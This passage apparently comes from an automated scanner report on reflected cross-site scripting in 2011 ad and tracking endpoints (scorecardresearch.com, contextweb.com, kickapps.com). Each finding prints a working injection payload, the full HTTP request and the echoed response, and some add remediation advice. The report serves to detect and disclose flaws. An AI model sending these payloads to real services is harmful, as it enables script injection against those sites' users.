D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"68206483fefc<script>alert(1)</script>27501cbb4f9", c3:"1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 8693d<script>alert(1)</script>cfac32cb3dd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=18693d<script>alert(1)</script>cfac32cb3dd&c4=&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"18693d<script>alert(1)</script>cfac32cb3dd", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 1b888<script>alert(1)</script>766fa601906 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=1b888<script>alert(1)</script>766fa601906&c5=&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"1b888<script>alert(1)</script>766fa601906", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7ff5d<script>alert(1)</script>d1dbf6139c2 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=7ff5d<script>alert(1)</script>d1dbf6139c2&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"", c5:"7ff5d<script>alert(1)</script>d1dbf6139c2", c6:"", c10:"", c15:"", c16:"", r:""});


1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload b35d1<script>alert(1)</script>a08224be487 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6=b35d1<script>alert(1)</script>a08224be487 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 16 Apr 2011 12:35:34 GMT
Date: Sat, 09 Apr 2011 12:35:34 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6820648", c3:"1", c4:"", c5:"", c6:"b35d1<script>alert(1)</script>a08224be487", c10:"", c15:"", c16:"", r:""});


1.63. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 161ef'%3balert(1)//69af9548b0 was submitted in the admeld_adprovider_id parameter. This input was echoed as 161ef';alert(1)//69af9548b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8161ef'%3balert(1)//69af9548b0&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:45 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 189
Date: Mon, 11 Apr 2011 16:31:44 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8161ef';alert(1)//69af9548b0&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');
1.64. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1900b'%3balert(1)//92af6dcc53a was submitted in the admeld_callback parameter. This input was echoed as 1900b';alert(1)//92af6dcc53a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match1900b'%3balert(1)//92af6dcc53a HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:47 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 190
Date: Mon, 11 Apr 2011 16:31:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match1900b';alert(1)//92af6dcc53a?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');
1.65. http://clientapps.kickapps.com/hearst/articleTitles.php [as parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the as request parameter is copied into a JavaScript rest-of-line comment. The payload 67904%0aalert(1)//1bfa9df98ab was submitted in the as parameter. This input was echoed as 67904
alert(1)//1bfa9df98ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=6297667904%0aalert(1)//1bfa9df98ab&lSize=4&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:20 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 1003

//http://serve.a-feed.com/service/getFeed.kickAction?as=6297667904
alert(1)//1bfa9df98ab&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
/**
Array
(
[url] => http://cdnse
...[SNIP]...
1.66. http://clientapps.kickapps.com/hearst/articleTitles.php [divName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the divName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f338'%3balert(1)//2266b1d758d was submitted in the divName parameter. This input was echoed as 7f338';alert(1)//2266b1d758d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4&divName=kickapps_mostcommented7f338'%3balert(1)//2266b1d758d&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:42 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 889

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
var title_container = document.getElementById('kickapps_mostcommented7f338';alert(1)//2266b1d758d');
if (title_container!=null){
   title_container.innerHTML='<span id="ka_article_titles">
...[SNIP]...
1.67. http://clientapps.kickapps.com/hearst/articleTitles.php [lSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The value of the lSize request parameter is copied into a JavaScript rest-of-line comment. The payload a6a6a%0aalert(1)//8cda9d9ad91 was submitted in the lSize parameter. This input was echoed as a6a6a
alert(1)//8cda9d9ad91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/articleTitles.php?as=62976&lSize=4a6a6a%0aalert(1)//8cda9d9ad91&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:30:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:30:33 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 14087

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4a6a6a
